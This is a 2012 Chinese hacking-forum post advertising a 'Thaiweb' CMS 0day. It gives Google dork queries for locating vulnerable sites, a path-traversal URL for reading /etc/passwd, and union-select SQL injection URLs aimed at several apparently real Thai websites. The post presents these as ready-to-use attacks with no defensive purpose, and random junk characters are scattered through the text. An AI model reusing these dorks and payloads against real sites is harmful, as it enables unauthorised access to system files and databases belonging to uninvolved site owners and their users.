找回密码
 立即注册
查看: 2467|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
+ c( ]5 y* W  Y1 u" r7 {* ~) B# U& ]  g& _' z# p3 [; |
intext:powered by Thaiweb
' J6 K& M* }& P( \$ M2 H2 w( `& M; v$ S+ B' o$ `" [3 s- G
inurl:index.php?page=board.php: o7 H1 |2 H3 g1 x4 `5 A

  z" D* [' I7 v1 G* K . w( y9 {+ x" {  z
4 X( _* @- {' ^8 _0 Q
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd/ t6 W( _( H3 n% H$ K7 s" S

" h3 O% }. Y; @. r - d! F6 r' Q3 r6 _" |1 c  c! }7 {  J

, `8 Z) `) e$ ?9 z  l! B2 ^利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
- \1 ^: h* H5 W) F3 ~) ~  T' ^9 W9 T4 N
; x! a$ N) N9 H) C# w+ c
2 X0 Y8 C2 u5 P
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--9 q! G  Z! c( x: M  ]+ X( Z

8 x2 n. U* ^( ]6 j7 h) L* G, dhttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--* m! d; w( |1 g- L7 _1 U7 A

5 ]  X8 B9 O# H, ]( @http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--* B0 ]$ c; q: x% Q' S6 n; X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表